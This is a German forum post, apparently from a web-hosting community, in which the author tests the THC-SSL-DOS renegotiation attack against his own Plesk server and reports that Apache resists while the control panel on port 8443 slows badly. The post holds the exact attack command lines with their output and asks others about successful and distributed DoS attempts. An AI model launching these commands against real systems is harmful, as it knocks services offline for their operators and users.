Hallo Freunde der gepflegten Weboberflächenadministration.
Wie heise.de gestern berichtete, hat eine dieser bösen Hackergruppen ein Tool veröffentlicht, um Server per SSL-Verbindungen in die Knie zu zwingen. Das Tool erzwingt haufenweise die Neuaushandlung der Schlüssel und erzeugt damit eine hohe Rechenlast auf dem Server.
Ich hab versucht, damit meinen vServer (Plesk 10 auf Ubuntu 10) anzugreifen. Ergebnis:
Apache2 hat Renegotiation per default disabled, https-Webseiten sind also nicht angreifbar:
Jedoch ist das Plesk ControlPanel (lighttpd) auf Port 8443 gut angreifbar, der CP-Deamon (sw-cp-serverd) erzeugt eine hohe Last (über 77%CPU und 9.2%MEM).
Grundsätzlich funktioniert es also. Jedoch bleibt der Server noch halbwegs stabil. Das CP reagiert zwar sehr lahm bis gar nicht, der Apache2 oder andere Dienste scheinen davon aber unbeeindruckt zu sein.
Habt ihr ein bisschen rumprobiert und evtl. erfolgreiche Angriffe starten können, z.B. der verteiltem DOS?
Grüße, Chris
Wie heise.de gestern berichtete, hat eine dieser bösen Hackergruppen ein Tool veröffentlicht, um Server per SSL-Verbindungen in die Knie zu zwingen. Das Tool erzwingt haufenweise die Neuaushandlung der Schlüssel und erzeugt damit eine hohe Rechenlast auf dem Server.
Ich hab versucht, damit meinen vServer (Plesk 10 auf Ubuntu 10) anzugreifen. Ergebnis:
Apache2 hat Renegotiation per default disabled, https-Webseiten sind also nicht angreifbar:
Code:
>thc-ssl-dos.exe -l 1000 <IP> 443 --accept --skip-delay
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
ERROR: Target has disabled renegotiation
Jedoch ist das Plesk ControlPanel (lighttpd) auf Port 8443 gut angreifbar, der CP-Deamon (sw-cp-serverd) erzeugt eine hohe Last (über 77%CPU und 9.2%MEM).
Code:
>thc-ssl-dos.exe -l 1000 <IP> 8443 --accept --skip-delay
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 28 [28.57 h/s], 28 Conn, 0 Err
Handshakes 57 [28.97 h/s], 56 Conn, 0 Err
Handshakes 84 [26.55 h/s], 79 Conn, 0 Err
Handshakes 119 [34.79 h/s], 101 Conn, 0 Err
Handshakes 151 [32.39 h/s], 122 Conn, 0 Err
(...)
Grundsätzlich funktioniert es also. Jedoch bleibt der Server noch halbwegs stabil. Das CP reagiert zwar sehr lahm bis gar nicht, der Apache2 oder andere Dienste scheinen davon aber unbeeindruckt zu sein.
Habt ihr ein bisschen rumprobiert und evtl. erfolgreiche Angriffe starten können, z.B. der verteiltem DOS?
Grüße, Chris